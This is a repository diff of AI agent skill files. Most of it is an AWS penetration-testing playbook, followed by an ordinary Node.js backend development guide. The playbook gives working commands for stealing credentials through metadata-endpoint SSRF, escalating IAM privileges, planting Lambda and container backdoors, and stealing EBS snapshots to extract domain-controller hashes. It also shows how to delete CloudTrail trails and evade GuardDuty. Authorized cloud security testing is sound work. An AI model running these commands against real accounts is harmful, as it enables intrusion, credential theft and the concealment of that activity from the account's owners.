| Tool | Purpose | Installation |
|------|---------|--------------|
| Pacu | AWS exploitation framework | `git clone https://github.com/RhinoSecurityLabs/pacu` |
| SkyArk | Shadow Admin discovery | `Import-Module .\SkyArk.ps1` |
| Prowler | Security auditing | `pip install prowler` |
| ScoutSuite | Multi-cloud auditing | `pip install scoutsuite` |
| enumerate-iam | Permission enumeration | `git clone https://github.com/andresriancho/enumerate-iam` |
| Principal Mapper | IAM analysis | `pip install principalmapper` |

---

## Core Workflow

### Step 1: Initial Enumeration

Identify the compromised identity and its permissions:

```bash
# Check current identity
aws sts get-caller-identity

# Configure profile
aws configure --profile compromised

# List access keys
aws iam list-access-keys

# Enumerate permissions
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
```

### Step 2: IAM Enumeration

```bash
# List all users
aws iam list-users

# List groups for user
aws iam list-groups-for-user --user-name TARGET_USER

# List attached policies
aws iam list-attached-user-policies --user-name TARGET_USER

# List inline policies
aws iam list-user-policies --user-name TARGET_USER

# Get policy details
aws iam get-policy --policy-arn POLICY_ARN
aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1

# List roles
aws iam list-roles
aws iam list-attached-role-policies --role-name ROLE_NAME
```

### Step 3: Metadata SSRF (EC2)

Exploit SSRF to access the metadata endpoint (IMDSv1):

```bash
# Access metadata endpoint
http://169.254.169.254/latest/meta-data/

# Get IAM role name
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Extract temporary credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME

# Response contains:
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "...",
  "Token": "...",
  "Expiration": "2019-08-01T05:20:30Z"
}
```

**For IMDSv2 (token required):**

```bash
# Get token first
TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
  "http://169.254.169.254/latest/api/token")

# Use token for requests
curl -H "X-aws-ec2-metadata-token:$TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
```
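
The same two-step token flow can be scripted; a hedged Python sketch using only the standard library (the endpoint is reachable only from inside an instance, so the network calls are shown as comments):

```python
import urllib.request

IMDS = "http://169.254.169.254/latest"

def build_token_request(ttl: int = 21600) -> urllib.request.Request:
    """Step 1: PUT request asking IMDSv2 for a session token."""
    return urllib.request.Request(
        f"{IMDS}/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)},
    )

def build_metadata_request(token: str, path: str) -> urllib.request.Request:
    """Step 2: GET request presenting the token for a metadata path."""
    return urllib.request.Request(
        f"{IMDS}/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )

# On an instance you would then run:
#   token = urllib.request.urlopen(build_token_request(), timeout=2).read().decode()
#   creds = urllib.request.urlopen(
#       build_metadata_request(token, "meta-data/iam/security-credentials/"),
#       timeout=2,
#   ).read().decode()
```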

**Fargate Container Credentials:**

```bash
# Read environment for credential path
/proc/self/environ
# Look for: AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...

# Access credentials
http://169.254.170.2/v2/credentials/CREDENTIAL-PATH
```

---

## Privilege Escalation Techniques

### Shadow Admin Permissions

These permissions are equivalent to administrator:

| Permission | Exploitation |
|------------|--------------|
| `iam:CreateAccessKey` | Create keys for admin user |
| `iam:CreateLoginProfile` | Set password for any user |
| `iam:AttachUserPolicy` | Attach admin policy to self |
| `iam:PutUserPolicy` | Add inline admin policy |
| `iam:AddUserToGroup` | Add self to admin group |
| `iam:PassRole` + `ec2:RunInstances` | Launch EC2 with admin role |
| `lambda:UpdateFunctionCode` | Inject code into Lambda |

### Create Access Key for Another User

```bash
aws iam create-access-key --user-name target_user
```

### Attach Admin Policy

```bash
aws iam attach-user-policy --user-name my_username \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
```

### Add Inline Admin Policy

```bash
aws iam put-user-policy --user-name my_username \
  --policy-name admin_policy \
  --policy-document file://admin-policy.json
```

### Lambda Privilege Escalation

```python
# code.py - Inject into Lambda function
import boto3

def lambda_handler(event, context):
    client = boto3.client('iam')
    response = client.attach_user_policy(
        UserName='my_username',
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    return response
```

```bash
# Update Lambda code
aws lambda update-function-code --function-name target_function \
  --zip-file fileb://malicious.zip
```
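
`update-function-code` expects a zip archive; a small helper for building the deployment package in memory (the file name `code.py` matches the snippet above, everything else is illustrative):

```python
import io
import zipfile

def package_lambda(source_name: str, source_code: str) -> bytes:
    """Zip a single handler file into Lambda deployment-package bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(source_name, source_code)
    return buf.getvalue()

payload = package_lambda(
    "code.py",
    "def lambda_handler(event, context):\n    return 'pwned'\n",
)
# `payload` is what you would write to malicious.zip before calling
# update-function-code with --zip-file fileb://malicious.zip
```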

---

## S3 Bucket Exploitation

### Bucket Discovery

```bash
# Using bucket_finder
./bucket_finder.rb wordlist.txt
./bucket_finder.rb --download --region us-east-1 wordlist.txt

# Common bucket URL patterns
https://{bucket-name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket-name}
```

### Bucket Enumeration

```bash
# List buckets (with creds)
aws s3 ls

# List bucket contents
aws s3 ls s3://bucket-name --recursive

# Download all files
aws s3 sync s3://bucket-name ./local-folder
```

### Public Bucket Search

```
https://buckets.grayhatwarfare.com/
```

---

## Lambda Exploitation

```bash
# List Lambda functions
aws lambda list-functions

# Get function code
aws lambda get-function --function-name FUNCTION_NAME
# Download URL provided in response

# Invoke function
aws lambda invoke --function-name FUNCTION_NAME output.txt
```

---

## SSM Command Execution

Systems Manager allows command execution on EC2 instances:

```bash
# List managed instances
aws ssm describe-instance-information

# Execute command
aws ssm send-command --instance-ids "i-0123456789" \
  --document-name "AWS-RunShellScript" \
  --parameters commands="whoami"

# Get command output
aws ssm list-command-invocations --command-id "CMD-ID" \
  --details --query "CommandInvocations[].CommandPlugins[].Output"
```

---

## EC2 Exploitation

### Mount EBS Volume

```bash
# Create snapshot of target volume
aws ec2 create-snapshot --volume-id vol-xxx --description "Audit"

# Create volume from snapshot
aws ec2 create-volume --snapshot-id snap-xxx --availability-zone us-east-1a

# Attach to attacker instance
aws ec2 attach-volume --volume-id vol-xxx --instance-id i-xxx --device /dev/xvdf

# Mount and access
sudo mkdir /mnt/stolen
sudo mount /dev/xvdf1 /mnt/stolen
```

### Shadow Copy Attack (Windows DC)

```bash
# CloudCopy technique
# 1. Create snapshot of DC volume
# 2. Share snapshot with attacker account
# 3. Mount in attacker instance
# 4. Extract NTDS.dit and SYSTEM
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local
```

---

## Console Access from API Keys

Convert CLI credentials to console access:

```bash
git clone https://github.com/NetSPI/aws_consoler
aws_consoler -v -a AKIAXXXXXXXX -s SECRETKEY

# Generates signin URL for console access
```

---

## Covering Tracks

### Disable CloudTrail

```bash
# Delete trail
aws cloudtrail delete-trail --name trail_name

# Disable global events
aws cloudtrail update-trail --name trail_name \
  --no-include-global-service-events

# Disable specific region
aws cloudtrail update-trail --name trail_name \
  --no-include-global-service-events --no-is-multi-region-trail
```

**Note:** Kali/Parrot/Pentoo Linux triggers GuardDuty alerts based on the user-agent. Use Pacu, which modifies the user-agent.

---

## Quick Reference

| Task | Command |
|------|---------|
| Get identity | `aws sts get-caller-identity` |
| List users | `aws iam list-users` |
| List roles | `aws iam list-roles` |
| List buckets | `aws s3 ls` |
| List EC2 | `aws ec2 describe-instances` |
| List Lambda | `aws lambda list-functions` |
| Get metadata | `curl http://169.254.169.254/latest/meta-data/` |

---

## Constraints

**Must:**
- Obtain written authorization before testing
- Document all actions for an audit trail
- Test in-scope resources only

**Must Not:**
- Modify production data without approval
- Leave persistent backdoors without documentation
- Disable security controls permanently

**Should:**
- Check for IMDSv2 before attempting metadata attacks
- Enumerate thoroughly before exploitation
- Clean up test resources after the engagement

---

## Examples

### Example 1: SSRF to Admin

```bash
# 1. Find SSRF vulnerability in web app
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# 2. Get role name from response
# 3. Extract credentials
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole

# 4. Configure AWS CLI with stolen creds
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

# 5. Verify access
aws sts get-caller-identity
```

---

## Troubleshooting

| Issue | Solution |
|-------|----------|
| Access Denied on all commands | Enumerate permissions with enumerate-iam |
| Metadata endpoint blocked | Check for IMDSv2, try container metadata |
| GuardDuty alerts | Use Pacu with a custom user-agent |
| Expired credentials | Re-fetch from metadata (temp creds rotate) |
| CloudTrail logging actions | Consider disabling logging or log obfuscation |

---

## Additional Resources

For advanced techniques including Lambda/API Gateway exploitation, Secrets Manager & KMS, Container security (ECS/EKS/ECR), RDS/DynamoDB exploitation, VPC lateral movement, and security checklists, see [references/advanced-aws-pentesting.md](references/advanced-aws-pentesting.md).
@@ -0,0 +1,469 @@
# Advanced AWS Penetration Testing Reference

## Table of Contents
- [Training Resources](#training-resources)
- [Extended Tools Arsenal](#extended-tools-arsenal)
- [AWS API Calls That Return Credentials](#aws-api-calls-that-return-credentials)
- [Lambda & API Gateway](#lambda--api-gateway)
- [Secrets Manager & KMS](#secrets-manager--kms)
- [Container Security (ECS/EKS/ECR)](#container-security-ecseksecr)
- [RDS Database Exploitation](#rds-database-exploitation)
- [DynamoDB Exploitation](#dynamodb-exploitation)
- [VPC Enumeration & Lateral Movement](#vpc-enumeration--lateral-movement)
- [Security Checklist](#security-checklist)

---

## Training Resources

| Resource | Description | URL |
|----------|-------------|-----|
| AWSGoat | Damn Vulnerable AWS Infrastructure | github.com/ine-labs/AWSGoat |
| Cloudgoat | AWS CTF-style scenarios | github.com/RhinoSecurityLabs/cloudgoat |
| Flaws | AWS security challenge | flaws.cloud |
| SadCloud | Terraform for vulnerable AWS | github.com/nccgroup/sadcloud |
| DVCA | Vulnerable Cloud App | medium.com/poka-techblog |

---

## Extended Tools Arsenal

### weirdAAL - AWS Attack Library
```bash
python3 weirdAAL.py -m ec2_describe_instances -t demo
python3 weirdAAL.py -m lambda_get_account_settings -t demo
python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2'
```

### cloudmapper - AWS Environment Analyzer
```bash
git clone https://github.com/duo-labs/cloudmapper.git
pipenv install --skip-lock
pipenv shell

# Commands
report       # Generate HTML report
iam_report   # IAM-specific report
audit        # Check misconfigurations
collect      # Collect account metadata
find_admins  # Identify admin users/roles
```

### cloudsplaining - IAM Security Assessment
```bash
pip3 install --user cloudsplaining
cloudsplaining download --profile myawsprofile
cloudsplaining scan --input-file default.json
```

### s3_objects_check - S3 Object Permissions
```bash
git clone https://github.com/nccgroup/s3_objects_check
python s3-objects-check.py -p whitebox-profile -e blackbox-profile
```

### dufflebag - Find EBS Secrets
```bash
# Finds secrets exposed via Amazon EBS's "public" mode
git clone https://github.com/BishopFox/dufflebag
```

---

## AWS API Calls That Return Credentials

| API Call | Description |
|----------|-------------|
| `chime:createapikey` | Create API key |
| `codepipeline:pollforjobs` | Poll for jobs |
| `cognito-identity:getopenidtoken` | Get OpenID token |
| `cognito-identity:getcredentialsforidentity` | Get identity credentials |
| `connect:getfederationtoken` | Get federation token |
| `ecr:getauthorizationtoken` | ECR auth token |
| `gamelift:requestuploadcredentials` | GameLift upload creds |
| `iam:createaccesskey` | Create access key |
| `iam:createloginprofile` | Create login profile |
| `iam:createservicespecificcredential` | Service-specific creds |
| `lightsail:getinstanceaccessdetails` | Instance access details |
| `lightsail:getrelationaldatabasemasteruserpassword` | DB master password |
| `rds-db:connect` | RDS connect |
| `redshift:getclustercredentials` | Redshift credentials |
| `sso:getrolecredentials` | SSO role credentials |
| `sts:assumerole` | Assume role |
| `sts:assumerolewithsaml` | Assume role with SAML |
| `sts:assumerolewithwebidentity` | Web identity assume |
| `sts:getfederationtoken` | Federation token |
| `sts:getsessiontoken` | Session token |
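
When triaging a captured policy, it helps to flag any allowed action that appears in this table; a minimal checker (the action set is transcribed from the rows above; matching is naive, case-insensitive, and does not expand `*` wildcards):

```python
# Actions from the table above that can yield credentials or tokens.
CREDENTIAL_ACTIONS = {
    "chime:createapikey", "codepipeline:pollforjobs",
    "cognito-identity:getopenidtoken", "cognito-identity:getcredentialsforidentity",
    "connect:getfederationtoken", "ecr:getauthorizationtoken",
    "gamelift:requestuploadcredentials", "iam:createaccesskey",
    "iam:createloginprofile", "iam:createservicespecificcredential",
    "lightsail:getinstanceaccessdetails",
    "lightsail:getrelationaldatabasemasteruserpassword",
    "rds-db:connect", "redshift:getclustercredentials",
    "sso:getrolecredentials", "sts:assumerole", "sts:assumerolewithsaml",
    "sts:assumerolewithwebidentity", "sts:getfederationtoken",
    "sts:getsessiontoken",
}

def credential_yielding(allowed_actions):
    """Return the subset of a policy's Action list found in the table."""
    return sorted(a for a in allowed_actions if a.lower() in CREDENTIAL_ACTIONS)

print(credential_yielding(["s3:GetObject", "sts:AssumeRole", "iam:CreateAccessKey"]))
# ['iam:CreateAccessKey', 'sts:AssumeRole']
```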

---

## Lambda & API Gateway

### Lambda Enumeration

```bash
# List all lambda functions
aws lambda list-functions

# Get function details and download code
aws lambda get-function --function-name FUNCTION_NAME
wget -O lambda-function.zip "url-from-previous-query"

# Get function policy
aws lambda get-policy --function-name FUNCTION_NAME

# List event source mappings
aws lambda list-event-source-mappings --function-name FUNCTION_NAME

# List Lambda layers (dependencies)
aws lambda list-layers
aws lambda get-layer-version --layer-name NAME --version-number VERSION
```

### API Gateway Enumeration

```bash
# List REST APIs
aws apigateway get-rest-apis

# Get specific API info
aws apigateway get-rest-api --rest-api-id ID

# List endpoints (resources)
aws apigateway get-resources --rest-api-id ID

# Get method info
aws apigateway get-method --rest-api-id ID --resource-id RES_ID --http-method GET

# List API versions (stages)
aws apigateway get-stages --rest-api-id ID

# List API keys
aws apigateway get-api-keys --include-values
```

### Lambda Credential Access

```bash
# Via RCE - get environment variables
https://apigateway/prod/system?cmd=env

# Via SSRF - access runtime API
https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/

# Via file read
https://apigateway/prod/system?cmd=file:///proc/self/environ
```

### Lambda Backdooring

```python
# Malicious Lambda code to escalate privileges
import boto3
import json

def handler(event, context):
    iam = boto3.client("iam")
    iam.attach_role_policy(
        RoleName="role_name",
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    iam.attach_user_policy(
        UserName="user_name",
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    return {'statusCode': 200, 'body': json.dumps("Pwned")}
```

```bash
# Update function with backdoor
aws lambda update-function-code --function-name NAME --zip-file fileb://backdoor.zip

# Invoke backdoored function
curl https://API_ID.execute-api.REGION.amazonaws.com/STAGE/ENDPOINT
```

---

## Secrets Manager & KMS

### Secrets Manager Enumeration

```bash
# List all secrets
aws secretsmanager list-secrets

# Describe specific secret
aws secretsmanager describe-secret --secret-id NAME

# Get resource policy
aws secretsmanager get-resource-policy --secret-id ID

# Retrieve secret value
aws secretsmanager get-secret-value --secret-id ID
```

### KMS Enumeration

```bash
# List KMS keys
aws kms list-keys

# Describe key
aws kms describe-key --key-id ID

# List key policies
aws kms list-key-policies --key-id ID

# Get full policy
aws kms get-key-policy --policy-name NAME --key-id ID
```

### KMS Decryption

```bash
# Decrypt file (key info embedded in ciphertext)
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query Plaintext
```

---

## Container Security (ECS/EKS/ECR)

### ECR Enumeration

```bash
# List repositories
aws ecr describe-repositories

# Get repository policy
aws ecr get-repository-policy --repository-name NAME

# List images
aws ecr list-images --repository-name NAME

# Describe image
aws ecr describe-images --repository-name NAME --image-ids imageTag=TAG
```

### ECS Enumeration

```bash
# List clusters
aws ecs list-clusters

# Describe cluster
aws ecs describe-clusters --cluster NAME

# List services
aws ecs list-services --cluster NAME

# Describe service
aws ecs describe-services --cluster NAME --services SERVICE

# List tasks
aws ecs list-tasks --cluster NAME

# Describe task (shows network info for pivoting)
aws ecs describe-tasks --cluster NAME --tasks TASK_ARN

# List container instances
aws ecs list-container-instances --cluster NAME
```

### EKS Enumeration

```bash
# List EKS clusters
aws eks list-clusters

# Describe cluster
aws eks describe-cluster --name NAME

# List node groups
aws eks list-nodegroups --cluster-name NAME

# Describe node group
aws eks describe-nodegroup --cluster-name NAME --nodegroup-name NODE_NAME

# List Fargate profiles
aws eks list-fargate-profiles --cluster-name NAME
```

### Container Backdooring

```bash
# Authenticate Docker to ECR
aws ecr get-login-password --region REGION | docker login --username AWS --password-stdin ECR_ADDR

# Build backdoored image
docker build -t image_name .

# Tag for ECR
docker tag image_name ECR_ADDR:IMAGE_NAME

# Push to ECR
docker push ECR_ADDR:IMAGE_NAME
```

### EKS Secrets via RCE

```bash
# List Kubernetes secrets
https://website.com/rce.php?cmd=ls /var/run/secrets/kubernetes.io/serviceaccount

# Get service account token
https://website.com/rce.php?cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token
```

---

## RDS Database Exploitation

### RDS Enumeration

```bash
# List RDS clusters
aws rds describe-db-clusters

# List RDS instances
aws rds describe-db-instances
# Check: IAMDatabaseAuthenticationEnabled: false = password auth

# List subnet groups
aws rds describe-db-subnet-groups

# List security groups
aws rds describe-db-security-groups

# List proxies
aws rds describe-db-proxies
```

### Password-Based Access

```bash
mysql -h HOSTNAME -u USERNAME -P PORT -p
```

### IAM-Based Access

```bash
# Generate auth token
TOKEN=$(aws rds generate-db-auth-token \
  --hostname HOSTNAME \
  --port PORT \
  --username USERNAME \
  --region REGION)

# Connect with token
mysql -h HOSTNAME -u USERNAME -P PORT \
  --enable-cleartext-plugin --password=$TOKEN
```

---

## DynamoDB Exploitation

```bash
# List tables
aws dynamodb list-tables

# Scan table contents
aws dynamodb scan --table-name TABLE_NAME | jq -r '.Items[]'

# Query specific items
aws dynamodb query --table-name TABLE_NAME \
  --key-condition-expression "pk = :pk" \
  --expression-attribute-values '{":pk":{"S":"user"}}'
```

---

## VPC Enumeration & Lateral Movement

### VPC Enumeration

```bash
# List VPCs
aws ec2 describe-vpcs

# List subnets
aws ec2 describe-subnets --filters "Name=vpc-id,Values=VPC_ID"

# List route tables
aws ec2 describe-route-tables --filters "Name=vpc-id,Values=VPC_ID"

# List Network ACLs
aws ec2 describe-network-acls

# List VPC peering connections
aws ec2 describe-vpc-peering-connections
```

### Route Table Targets

| Destination | Target | Description |
|-------------|--------|-------------|
| IP | `local` | VPC internal |
| IP | `igw` | Internet Gateway |
| IP | `nat` | NAT Gateway |
| IP | `pcx` | VPC Peering |
| IP | `vpce` | VPC Endpoint |
| IP | `vgw` | VPN Gateway |
| IP | `eni` | Network Interface |
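
Target IDs returned by `describe-route-tables` carry their type in the prefix; a small classifier built from the table above (the example IDs are illustrative, and real route entries spread targets across fields such as `GatewayId` and `NatGatewayId`):

```python
# Map route-target prefixes (from the table above) to their meaning.
TARGET_TYPES = {
    "local": "VPC internal",
    "igw": "Internet Gateway",
    "nat": "NAT Gateway",
    "pcx": "VPC Peering",
    "vpce": "VPC Endpoint",
    "vgw": "VPN Gateway",
    "eni": "Network Interface",
}

def classify_target(target_id: str) -> str:
    """Classify a route-table target value by its hyphen-delimited prefix."""
    prefix = target_id.split("-", 1)[0]
    return TARGET_TYPES.get(prefix, "unknown")

print(classify_target("igw-0a1b2c3d"))   # Internet Gateway
print(classify_target("local"))          # VPC internal
print(classify_target("pcx-0d4e5f6a"))   # VPC Peering
```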

### Lateral Movement via VPC Peering

```bash
# List peering connections
aws ec2 describe-vpc-peering-connections

# List instances in target VPC
aws ec2 describe-instances --filters "Name=vpc-id,Values=VPC_ID"

# List instances in specific subnet
aws ec2 describe-instances --filters "Name=subnet-id,Values=SUBNET_ID"
```

---

## Security Checklist

### Identity and Access Management
- [ ] Avoid use of root account
- [ ] MFA enabled for all IAM users with console access
- [ ] Disable credentials unused for 90+ days
- [ ] Rotate access keys every 90 days
- [ ] Password policy: uppercase, lowercase, symbol, number, 14+ chars
- [ ] No root access keys exist
- [ ] MFA enabled for root account
- [ ] IAM policies attached to groups/roles only
|
||||||
|
|
||||||
|
### Logging
|
||||||
|
- [ ] CloudTrail enabled in all regions
|
||||||
|
- [ ] CloudTrail log file validation enabled
|
||||||
|
- [ ] CloudTrail S3 bucket not publicly accessible
|
||||||
|
- [ ] CloudTrail integrated with CloudWatch Logs
|
||||||
|
- [ ] AWS Config enabled in all regions
|
||||||
|
- [ ] CloudTrail logs encrypted with KMS
|
||||||
|
- [ ] KMS key rotation enabled
|
||||||
|
|
||||||
|
### Networking
|
||||||
|
- [ ] No security groups allow 0.0.0.0/0 to port 22
|
||||||
|
- [ ] No security groups allow 0.0.0.0/0 to port 3389
|
||||||
|
- [ ] VPC flow logging enabled
|
||||||
|
- [ ] Default security group restricts all traffic
|
||||||
|
|
||||||
|
### Monitoring
|
||||||
|
- [ ] Alarm for unauthorized API calls
|
||||||
|
- [ ] Alarm for console sign-in without MFA
|
||||||
|
- [ ] Alarm for root account usage
|
||||||
|
- [ ] Alarm for IAM policy changes
|
||||||
|
- [ ] Alarm for CloudTrail config changes
|
||||||
|
- [ ] Alarm for console auth failures
|
||||||
|
- [ ] Alarm for CMK disabling/deletion
|
||||||
|
- [ ] Alarm for S3 bucket policy changes
|
||||||
|
- [ ] Alarm for security group changes
|
||||||
|
- [ ] Alarm for NACL changes
|
||||||
|
- [ ] Alarm for VPC changes
|
||||||
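Each monitoring item above is typically implemented as a CloudWatch metric filter on the CloudTrail log group plus an alarm. A sketch for the root-account-usage alarm; the log group name, metric namespace, and SNS topic ARN are placeholders you would substitute:

```shell
# Metric filter matching root-account activity in CloudTrail logs
aws logs put-metric-filter \
  --log-group-name CloudTrail/DefaultLogGroup \
  --filter-name RootAccountUsage \
  --filter-pattern '{ $.userIdentity.type = "Root" && $.userIdentity.invokedBy NOT EXISTS && $.eventType != "AwsServiceEvent" }' \
  --metric-transformations metricName=RootAccountUsageCount,metricNamespace=SecurityMetrics,metricValue=1

# Alarm that fires on any match and notifies an SNS topic
aws cloudwatch put-metric-alarm \
  --alarm-name root-account-usage \
  --metric-name RootAccountUsageCount \
  --namespace SecurityMetrics \
  --statistic Sum --period 300 --threshold 1 \
  --comparison-operator GreaterThanOrEqualToThreshold \
  --evaluation-periods 1 \
  --alarm-actions arn:aws:sns:us-east-1:111122223333:security-alerts
```

The remaining alarms follow the same shape with a different `--filter-pattern`.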
302
skills/backend-dev-guidelines/SKILL.md
Normal file
@@ -0,0 +1,302 @@
---
name: backend-dev-guidelines
description: Comprehensive backend development guide for Node.js/Express/TypeScript microservices. Use when creating routes, controllers, services, repositories, middleware, or working with Express APIs, Prisma database access, Sentry error tracking, Zod validation, unifiedConfig, dependency injection, or async patterns. Covers layered architecture (routes → controllers → services → repositories), BaseController pattern, error handling, performance monitoring, testing strategies, and migration from legacy patterns.
---

# Backend Development Guidelines

## Purpose

Establish consistency and best practices across backend microservices (blog-api, auth-service, notifications-service) using modern Node.js/Express/TypeScript patterns.

## When to Use This Skill

Automatically activates when working on:

- Creating or modifying routes, endpoints, APIs
- Building controllers, services, repositories
- Implementing middleware (auth, validation, error handling)
- Database operations with Prisma
- Error tracking with Sentry
- Input validation with Zod
- Configuration management
- Backend testing and refactoring

---

## Quick Start

### New Backend Feature Checklist

- [ ] **Route**: Clean definition, delegate to controller
- [ ] **Controller**: Extend BaseController
- [ ] **Service**: Business logic with DI
- [ ] **Repository**: Database access (if complex)
- [ ] **Validation**: Zod schema
- [ ] **Sentry**: Error tracking
- [ ] **Tests**: Unit + integration tests
- [ ] **Config**: Use unifiedConfig

### New Microservice Checklist

- [ ] Directory structure (see [architecture-overview.md](architecture-overview.md))
- [ ] instrument.ts for Sentry
- [ ] unifiedConfig setup
- [ ] BaseController class
- [ ] Middleware stack
- [ ] Error boundary
- [ ] Testing framework

---

## Architecture Overview

### Layered Architecture

```
HTTP Request
    ↓
Routes (routing only)
    ↓
Controllers (request handling)
    ↓
Services (business logic)
    ↓
Repositories (data access)
    ↓
Database (Prisma)
```

**Key Principle:** Each layer has ONE responsibility.

See [architecture-overview.md](architecture-overview.md) for complete details.

---

## Directory Structure

```
service/src/
├── config/          # UnifiedConfig
├── controllers/     # Request handlers
├── services/        # Business logic
├── repositories/    # Data access
├── routes/          # Route definitions
├── middleware/      # Express middleware
├── types/           # TypeScript types
├── validators/      # Zod schemas
├── utils/           # Utilities
├── tests/           # Tests
├── instrument.ts    # Sentry (FIRST IMPORT)
├── app.ts           # Express setup
└── server.ts        # HTTP server
```

**Naming Conventions:**

- Controllers: `PascalCase` - `UserController.ts`
- Services: `camelCase` - `userService.ts`
- Routes: `camelCase + Routes` - `userRoutes.ts`
- Repositories: `PascalCase + Repository` - `UserRepository.ts`

---

## Core Principles (7 Key Rules)

### 1. Routes Only Route, Controllers Control

```typescript
// ❌ NEVER: Business logic in routes
router.post('/submit', async (req, res) => {
  // 200 lines of logic
});

// ✅ ALWAYS: Delegate to controller
router.post('/submit', (req, res) => controller.submit(req, res));
```

### 2. All Controllers Extend BaseController

```typescript
export class UserController extends BaseController {
  async getUser(req: Request, res: Response): Promise<void> {
    try {
      const user = await this.userService.findById(req.params.id);
      this.handleSuccess(res, user);
    } catch (error) {
      this.handleError(error, res, 'getUser');
    }
  }
}
```
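The `BaseController` itself is project-specific and not reproduced in this file. A minimal, dependency-free sketch of what it might look like — the `handleSuccess`/`handleError` names come from the examples in this guide, the rest (envelope shape, `ResponseLike` stand-in for Express's `Response`) is assumption:

```typescript
// Minimal stand-in for Express's Response so the sketch is self-contained.
interface ResponseLike {
  statusCode: number;
  status(code: number): ResponseLike;
  json(body: unknown): ResponseLike;
}

// Hypothetical AppError shape (see async-and-errors.md).
interface AppErrorLike extends Error {
  statusCode: number;
  code: string;
}

export abstract class BaseController {
  // Uniform success envelope used by every controller.
  protected handleSuccess(res: ResponseLike, data: unknown, message = 'OK'): void {
    res.status(200).json({ success: true, message, data });
  }

  // Uniform error handling: known AppErrors map to their status code,
  // anything else becomes a 500 (and would also be reported to Sentry).
  protected handleError(error: unknown, res: ResponseLike, operation: string): void {
    const appError = error as Partial<AppErrorLike>;
    if (typeof appError.statusCode === 'number') {
      res.status(appError.statusCode).json({
        error: { message: appError.message, code: appError.code, operation },
      });
      return;
    }
    res.status(500).json({ error: { message: 'Internal server error', operation } });
  }
}
```

Because every controller inherits these two methods, the try/catch in each handler stays three lines long and response shapes stay consistent across services.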

### 3. All Errors to Sentry

```typescript
try {
  await operation();
} catch (error) {
  Sentry.captureException(error);
  throw error;
}
```

### 4. Use unifiedConfig, NEVER process.env

```typescript
// ❌ NEVER
const timeout = process.env.TIMEOUT_MS;

// ✅ ALWAYS
import { config } from './config/unifiedConfig';
const timeout = config.timeouts.default;
```
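The point of `unifiedConfig` is that `process.env` is read once, validated at boot, and everything downstream gets a typed, frozen object. The actual module isn't shown in this file; a minimal sketch under that assumption (field names like `timeouts.default` follow the example above, the rest is illustrative):

```typescript
// Sketch of a unifiedConfig module: read the environment exactly once at
// startup, coerce and validate, and export a typed, frozen object.
interface AppConfig {
  port: number;
  timeouts: { default: number };
  sentryDsn: string | undefined;
}

export function loadConfig(env: Record<string, string | undefined>): AppConfig {
  const port = Number(env.PORT ?? 3000);
  const defaultTimeout = Number(env.TIMEOUT_MS ?? 5000);
  if (!Number.isInteger(port) || port <= 0) {
    // Fail fast at boot, not at request time.
    throw new Error(`Invalid PORT: ${env.PORT}`);
  }
  return Object.freeze({
    port,
    timeouts: Object.freeze({ default: defaultTimeout }),
    sentryDsn: env.SENTRY_DSN,
  });
}

export const config = loadConfig((globalThis as any).process?.env ?? {});
```

Misconfiguration then crashes the service at startup with a clear message instead of surfacing as `undefined` deep inside a request handler.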

### 5. Validate All Input with Zod

```typescript
const schema = z.object({ email: z.string().email() });
const validated = schema.parse(req.body);
```

### 6. Use Repository Pattern for Data Access

```typescript
// Service → Repository → Database
const users = await userRepository.findActive();
```
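A repository like the `userRepository` above is just a class that owns all database access for one entity. A self-contained sketch — an in-memory array stands in for Prisma here so the example runs on its own; a real repository would make the equivalent `PrismaService.main.user.*` calls (method names `findActive`/`findByEmail` follow this guide's examples):

```typescript
interface User { id: number; email: string; active: boolean; }

export class UserRepository {
  // In-memory stand-in for the database table.
  constructor(private readonly store: User[] = []) {}

  async create(data: Omit<User, 'id'>): Promise<User> {
    const user: User = { id: this.store.length + 1, ...data };
    this.store.push(user);
    return user;
  }

  async findByEmail(email: string): Promise<User | null> {
    return this.store.find(u => u.email === email) ?? null;
  }

  async findActive(): Promise<User[]> {
    return this.store.filter(u => u.active);
  }
}
```

Services depend only on this interface, so swapping Prisma for anything else (or for a test double) never touches business logic.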

### 7. Comprehensive Testing Required

```typescript
describe('UserService', () => {
  it('should create user', async () => {
    expect(user).toBeDefined();
  });
});
```

---

## Common Imports

```typescript
// Express
import express, { Request, Response, NextFunction, Router } from 'express';

// Validation
import { z } from 'zod';

// Database
import { PrismaClient } from '@prisma/client';
import type { Prisma } from '@prisma/client';

// Sentry
import * as Sentry from '@sentry/node';

// Config
import { config } from './config/unifiedConfig';

// Middleware
import { SSOMiddlewareClient } from './middleware/SSOMiddleware';
import { asyncErrorWrapper } from './middleware/errorBoundary';
```

---

## Quick Reference

### HTTP Status Codes

| Code | Use Case |
|------|----------|
| 200 | Success |
| 201 | Created |
| 400 | Bad Request |
| 401 | Unauthorized |
| 403 | Forbidden |
| 404 | Not Found |
| 500 | Server Error |

### Service Templates

- **Blog API** (✅ Mature) - Use as template for REST APIs
